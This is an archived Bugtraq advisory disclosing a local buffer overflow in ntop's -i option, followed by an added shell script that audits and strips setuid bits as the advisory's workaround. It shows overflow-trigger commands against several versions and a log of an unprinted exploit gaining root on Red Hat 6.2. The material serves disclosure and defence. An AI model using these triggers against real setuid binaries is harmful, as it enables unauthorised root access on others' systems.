Bugtraq mailing list archives

Security Advisory - ntop local buffer overflow vulnerability (fwd)


From: BAILLEUX Christophe <cb () GROLIER FR>
Date: Tue, 24 Oct 2000 13:42:03 +0200

Subject         : ntop local buffer overflow vulnerability
Author          : Christophe BAILLEUX (cb () grolier fr)
Platforms       : *nix
Tested versions : ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2



I.      Problem

All ntop versions are vulnerable to a local buffer overflow in their
-i option.
Ntop must be owned by root with the setuid bit set for the attacker to
gain root privileges.



II.     Demo


a) ntop 1.1


tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
ntop v.1.1 MT [i686-pc-linux-gnu] listening on
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.1$


b) ntop 1.2a7

tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$



c) ntop 1.3.1


tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$


d) ntop 1.3.2

tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00
07:04:32 PM build)
24/Oct/2000:12:32:16 Listening on
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri () ntop org>
24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
24/Oct/2000:12:32:16 Initialising...
Segmentation fault
tshaw:/home/cb/ntop-1.3.2$




III.    Workaround

chmod ug-s path/to/ntop

ntop team has been informed (http://www.ntop.org).






IV.     Exploit (See Attachment)


Tested on Red Hat 6.2 (Zoot), where ntop is installed by default with the
setuid root bit set.


[cb@nux cb]$ cat /etc/redhat-release
Red Hat Linux release 6.2 (Zoot)
[cb@nux cb]$ rpm -qf /sbin/ntop
ntop-1.1-1
[cb@nux cb]$ id
uid=535(cb) gid=535(cb) groups=535(cb)
[cb@nux cb]$ ./expl

ntop v.1.1 MT [i586-pc-linux-gnu] listening on
..............................

Host        Act   -Rcvd-      Sent    TCP   UDP ICMP
bash#
bash# id
uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
bash# exit
[cb@nux cb]$



Greetings to kalou, Bdev, cleb, dv, PullthePlug Community and all I
forget.
Thanks to Teuk for letting me use his server to build and test the ntop
Red Hat 6.2 exploit :)

Regards,


--
BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cb () grolier fr

Attachment: ntop-1.1-1-ex.c
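
A way to verify and apply the workaround from section III on a host, as an added example that is not part of the original advisory or of ntop itself. The function names and the directory list in the usage comment are assumptions; only /sbin/ntop appears in the advisory.

```shell
#!/bin/sh
# Added example: audit for setuid/setgid ntop binaries and apply the
# advisory's "chmod ug-s" workaround. Function names are hypothetical.

# Succeeds if $1 is a regular file with the setuid or setgid bit set.
# Symlinks are not followed by find, so they are never reported.
has_setid() {
    [ -f "$1" ] || return 1
    [ -n "$(find "$1" -prune -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null)" ]
}

# Apply the workaround to one file, then confirm both bits are gone.
strip_setid() {
    chmod ug-s "$1" || return 1
    ! has_setid "$1"
}

# audit_ntop MODE DIR...
#   MODE "report": list every DIR/ntop that is still setuid/setgid.
#   MODE "fix":    also remove the bits from each one found.
# Returns 0 when no setuid/setgid ntop remains, 1 otherwise.
audit_ntop() {
    mode=$1
    shift
    remaining=0
    for dir in "$@"; do
        f="$dir/ntop"
        has_setid "$f" || continue
        ls -l "$f"                      # show owner and mode for the record
        if [ "$mode" = fix ] && strip_setid "$f"; then
            echo "fixed: $f"
        else
            remaining=$((remaining + 1))
        fi
    done
    [ "$remaining" -eq 0 ]
}

# Usage (directory list is an assumption; adjust to the host):
#   audit_ntop report /sbin /usr/sbin /usr/local/sbin
#   audit_ntop fix    /sbin /usr/sbin /usr/local/sbin
```

Removing the bits stops the overflow from yielding elevated privileges; ntop then has to be started by root to capture packets.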